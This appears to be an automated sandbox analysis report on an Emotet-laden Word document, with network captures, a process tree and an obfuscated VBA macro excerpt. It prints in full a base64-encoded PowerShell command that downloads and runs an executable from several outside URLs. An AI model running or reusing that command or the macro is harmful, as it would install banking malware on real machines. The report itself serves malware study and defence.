                Sep 20, 2019 13:30:09.085988045 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086082935 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086098909 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086194992 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086280107 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086364031 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086369991 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086468935 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086540937 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086610079 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086688995 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086785078 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086833954 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086898088 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.086987019 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.086990118 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087121010 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087212086 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087266922 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.087297916 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087408066 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087415934 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.087498903 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087569952 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.087601900 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087702036 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087807894 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.087831974 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.087915897 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.088018894 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.088076115 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.088110924 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.088682890 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.197242022 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197278023 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197352886 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197417021 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.197449923 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197552919 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197628021 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197633028 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.197762012 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197777033 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.197829962 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.197931051 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.200251102 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200329065 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200407982 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200469017 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.200541019 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200608969 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200644016 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.200719118 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200850010 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.200963020 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.203258038 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203371048 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203402042 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203505993 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203572035 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.203603983 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203716040 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203819036 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.203860998 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.203903913 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204010010 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.204011917 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204117060 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204222918 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204241037 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.204324961 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204379082 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.204425097 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204525948 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.204684973 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.205642939 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.211277962 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.211344957 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.211513996 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.211594105 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.211600065 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216373920 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.216432095 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216460943 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216480970 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216499090 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216516972 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216536045 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216553926 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216572046 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216589928 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216612101 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216624975 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216644049 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216662884 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216680050 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216698885 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216716051 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216733932 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216762066 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216779947 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216799021 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.216816902 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.222572088 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.222759962 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.223519087 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.323061943 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323107004 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323168993 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323267937 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323271990 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.323402882 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323489904 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323515892 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.323590040 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323682070 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.323682070 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.325934887 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326009035 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.326276064 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326363087 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326630116 CEST49163443192.168.1.16198.49.65.242
                Sep 20, 2019 13:30:09.326782942 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326916933 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.326998949 CEST44349163198.49.65.242192.168.1.16
                Sep 20, 2019 13:30:09.327080965 CEST44349163198.49.65.242192.168.1.16

                UDP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Sep 20, 2019 13:30:07.499588966 CEST | 53666 | 53 | 192.168.1.16 | 8.8.8.8
                Sep 20, 2019 13:30:07.538263083 CEST | 53 | 53666 | 8.8.8.8 | 192.168.1.16

                ICMP Packets

                Timestamp | Source IP | Dest IP | Checksum | Code | Type
                Sep 20, 2019 13:31:38.471829891 CEST | 181.164.8.25 | 192.168.1.16 | 7c97 | (Host unreachable) | Destination Unreachable

                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Sep 20, 2019 13:30:07.499588966 CEST | 192.168.1.16 | 8.8.8.8 | 0x9ed2 | Standard query (0) | sabiosdelamor.co | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Sep 20, 2019 13:30:07.538263083 CEST | 8.8.8.8 | 192.168.1.16 | 0x9ed2 | No error (0) | sabiosdelamor.co | | 198.49.65.242 | A (IP address) | IN (0x0001)

                HTTPS Packets

                Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                Sep 20, 2019 13:30:07.831115007 CEST | 198.49.65.242 | 443 | 192.168.1.16 | 49163 | CN=sabiosdelamor.co | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | Tue Sep 17 02:00:00 CEST 2019 | Tue Dec 17 00:59:59 CET 2019 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d
                | | | | | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025 | |
                | | | | | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE | Tue May 30 12:48:38 CEST 2000 | Sat May 30 12:48:38 CEST 2020 | |

                Code Manipulations

                Statistics

                CPU Usage

                Memory Usage

                High Level Behavior Distribution

                Behavior

                System Behavior

                General

                Start time:13:29:24
                Start date:20/09/2019
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Imagebase:0x2f3e0000
                File size:1423008 bytes
                MD5 hash:5D798FF0BE2A8970D932568068ACFD9D
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:13:29:41
                Start date:20/09/2019
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA
                Imagebase:0x21ae0000
                File size:452608 bytes
                MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Start time:13:29:48
                Start date:20/09/2019
                Path:C:\Users\user\982.exe
                Wow64 process (32bit):false
                Commandline:'C:\Users\user\982.exe'
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000004.00000002.296876594.002C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000004.00000002.297316445.00523000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Antivirus matches:
                • Detection: 16%, Virustotal, Browse
                Reputation:low

                General

                Start time:13:29:48
                Start date:20/09/2019
                Path:C:\Users\user\982.exe
                Wow64 process (32bit):false
                Commandline:'C:\Users\user\982.exe'
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000005.00000001.295966721.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Start time:13:29:50
                Start date:20/09/2019
                Path:C:\Users\user\982.exe
                Wow64 process (32bit):false
                Commandline:--4e722ada
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000006.00000002.302449572.003E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000006.00000002.302707019.00493000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Start time:13:29:51
                Start date:20/09/2019
                Path:C:\Users\user\982.exe
                Wow64 process (32bit):false
                Commandline:--4e722ada
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Start time:13:29:53
                Start date:20/09/2019
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                Imagebase:0x1e0000
                File size:107192 bytes
                MD5 hash:BD2AE15EFB47E5215B4D0C59EA00C91A
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate

                General

                Start time:13:29:59
                Start date:20/09/2019
                Path:C:\Windows\System32\sortedwatched.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\sortedwatched.exe
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000009.00000002.323191242.005A3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 00000009.00000002.322934550.003E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Start time:13:29:59
                Start date:20/09/2019
                Path:C:\Windows\System32\sortedwatched.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\sortedwatched.exe
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000A.00000002.322151721.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000A.00000001.321515804.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Start time:13:30:01
                Start date:20/09/2019
                Path:C:\Windows\System32\sortedwatched.exe
                Wow64 process (32bit):false
                Commandline:--2a75e385
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000B.00000002.327425390.005B3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                General

                Start time:13:30:01
                Start date:20/09/2019
                Path:C:\Windows\System32\sortedwatched.exe
                Wow64 process (32bit):false
                Commandline:--2a75e385
                Imagebase:0x400000
                File size:425472 bytes
                MD5 hash:3A74A93E7831D0953B5CEFB9C98505F1
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                • Rule: Emotet, Description: detect Emotet in memory, Source: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                Reputation:low

                Disassembly

                Code Analysis

                Call Graph

                Graph

                Module: JIodCjfv

                Declaration
                Line | Content
                1 | Attribute VB_Name = "JIodCjfv"

                Executed Functions
                APIs | Meta Information


                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: lsaWRUr

                Part of subcall function dztj37@snLF1V: ShWp3jNB

                Part of subcall function dztj37@snLF1V: tnXUzJ0O

                Part of subcall function dztj37@snLF1V: MM3V6h

                Part of subcall function dztj37@snLF1V: CStr

                Part of subcall function dztj37@snLF1V: GdQwslU

                Part of subcall function dztj37@snLF1V: j_72KM

                Part of subcall function dztj37@snLF1V: HpAvVal

                Part of subcall function dztj37@snLF1V: cLEAWn

                Part of subcall function dztj37@snLF1V: ChrW

                Part of subcall function dztj37@snLF1V: Oct

                Part of subcall function dztj37@snLF1V: CDate

                Part of subcall function dztj37@snLF1V: Fix

                Part of subcall function dztj37@snLF1V: lA6KKk

                Part of subcall function dztj37@snLF1V: J3J3pfPR

                Part of subcall function dztj37@snLF1V: hzkYTP82

                Part of subcall function dztj37@snLF1V: Sin

                Part of subcall function dztj37@snLF1V: cISYkJs

                Part of subcall function dztj37@snLF1V: Sff8wzaz

                Part of subcall function dztj37@snLF1V: B8wUj_W

                xqmm6672

                whapPJb

                ow8oQWti

                Tan

                YcqUOCsQ

                CDate

                OkzDrVT

                CBH1HB

                mzTRZThP

                ATaMOL

                CStr

                bQrbmIrJ

                SnjS4W9c

                i2w7lPf

                lbDPzY6

                ChrW

                Oct

                CDate

                Fix

                w3wS1B

                zaBTww

                Mntl4i7

                Sin

                dOmmAiqP

                Fi6Vjz

                XZJ7qqlh

                Line | Instruction | Meta Information
                2 | Sub autoopen() |
                3 | On Error Resume Next | executed
                4 | Set mna = xqmm6672 | xqmm6672
                5 | Do | fXaz2u, D5Yzqc
                6 | If wqLToroz = Na5naWHG Then | wqLToroz, Na5naWHG
                7 | PhaBus1_ = Tan(1141) | Tan
                8 | Endif |
                9 | qNXwDA = ol1JHUw * CDate(tHW47ffa) / Hj82oV / CDHkaIfU + (HZGOlw / CStr(EO5s3Wov) / 3 * CStr(ruLzmW)) | ol1JHUw, CDate, tHW47ffa, Hj82oV, CDHkaIfU, HZGOlw, CStr, EO5s3Wov, ruLzmW
                10 | For Each oSsOXl in NAJ70I4 | NAJ70I4
                11 | OEVLv8 = Xfh3Uz - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(ZBpK33S) - 6977 - EnmJEs2 - RRZ6BWC * Sin(Frj8OZbd) | Xfh3Uz, ChrW, Oct, CDate, Fix, ZBpK33S, EnmJEs2, RRZ6BWC, Sin, Frj8OZbd
                12 | Next | NAJ70I4
                13 | Loop Until fXaz2u = D5Yzqc | fXaz2u, D5Yzqc
                14 | If RecentFiles.Count > 3 Then | Count, RecentFiles
                15 | dztj37 |
                16 | Endif |
                17 | On Error Resume Next |
                18 | Set mna = xqmm6672 | xqmm6672
                19 | Do | Fi6Vjz, XZJ7qqlh
                20 | If whapPJb = ow8oQWti Then | whapPJb, ow8oQWti
                21 | cc6fSzI = Tan(1141) | Tan
                22 | Endif |
                23 | nI9cqO = YcqUOCsQ * CDate(OkzDrVT) / CBH1HB / mzTRZThP + (ATaMOL / CStr(bQrbmIrJ) / 3 * CStr(SnjS4W9c)) | YcqUOCsQ, CDate, OkzDrVT, CBH1HB, mzTRZThP, ATaMOL, CStr, bQrbmIrJ, SnjS4W9c
                24 | For Each sRRzpU in i2w7lPf | i2w7lPf
                25 | QMKkQZu4 = lbDPzY6 - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(w3wS1B) - 6977 - zaBTww - Mntl4i7 * Sin(dOmmAiqP) | lbDPzY6, ChrW, Oct, CDate, Fix, w3wS1B, zaBTww, Mntl4i7, Sin, dOmmAiqP
                26 | Next | i2w7lPf
                27 | Loop Until Fi6Vjz = XZJ7qqlh | Fi6Vjz, XZJ7qqlh
                28 | End Sub |

                APIs | Meta Information


                CreateObject

                CreateObject("winmgmts:Win32_ProcessStartup")


                Line | Instruction | Meta Information
                29 | Function R3tnEz2D() |
                30 | ZfdJRPiY = kULEiwf + DAbbE9mG | kULEiwf, DAbbE9mG, executed
                31 | On Error Resume Next |
                32 | Set mna = xqmm6672 | xqmm6672
                33 | Do | N06UkOi, sNGNZi
                34 | If f1ocqu = wZfG2P Then | f1ocqu, wZfG2P
                35 | EE3NY5nB = Tan(1141) | Tan
                36 | Endif |
                37 | jQhhhQSc = DtWubh * CDate(NdN1rET) / NosNmj4 / kZ3OzYB + (TtIw36Hv / CStr(pkcNH7C) / 3 * CStr(rbJdmEz)) | DtWubh, CDate, NdN1rET, NosNmj4, kZ3OzYB, TtIw36Hv, CStr, pkcNH7C, rbJdmEz
                38 | For Each BpzwCL7 in ZwwF3I | ZwwF3I
                39 | oPMvTw = qcOQjrD - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(mwv_hRR) - 6977 - cCsukAJS - T4t4PSN * Sin(WrztcmHX) | qcOQjrD, ChrW, Oct, CDate, Fix, mwv_hRR, cCsukAJS, T4t4PSN, Sin, WrztcmHX
                40 | Next | ZwwF3I
                41 | Loop Until N06UkOi = sNGNZi | N06UkOi, sNGNZi
                42 | Set R3tnEz2D = CreateObject(lTzGN9z + UMvDUH(ThisDocument.QFa7Tzv) + RI34Jc) | CreateObject("winmgmts:Win32_ProcessStartup"), lTzGN9z, QFa7Tzv, RI34Jc, executed
                43 | On Error Resume Next |
                44 | Set mna = xqmm6672 | xqmm6672
                45 | Do | DHQs26, CKCNjv
                46 | If ZD4NzNKp = dYFvGWI Then | ZD4NzNKp, dYFvGWI
                47 | FIHNkM = Tan(1141) | Tan
                48 | Endif |
                49 | Jd7zMAU_ = OObwzR * CDate(EIw3Db08) / T1TAVR_L / SXvvII2T + (S1hkHVH / CStr(a1QujnI) / 3 * CStr(uJwlJz)) | OObwzR, CDate, EIw3Db08, T1TAVR_L, SXvvII2T, S1hkHVH, CStr, a1QujnI, uJwlJz
                50 | For Each TCu6kpE7 in Pt5_Krw | Pt5_Krw
                51 | FnLI_N = mjvrs8a - ChrW(6 + Oct(206871448 / CDate(85))) + 7990 - Fix(df7KLz) - 6977 - rLX5_E - qhEL6us * Sin(RWp2lz) | mjvrs8a, ChrW, Oct, CDate, Fix, df7KLz, rLX5_E, qhEL6us, Sin, RWp2lz
                52 | Next | Pt5_Krw
                53 | Loop Until DHQs26 = CKCNjv | DHQs26, CKCNjv
                54 | R3tnEz2D.ShowWindow! = ZfdJRPiY |
                55 | On Error Resume Next |
                56 | Set mna = xqmm6672 | xqmm6672
                57 | Do | FnZwmD_A, KUA7zY
                58 | If hUPJJL = oihAvpA Then | hUPJJL, oihAvpA
                59 | CCj5oD = Tan(1141) | Tan
                60 | Endif |
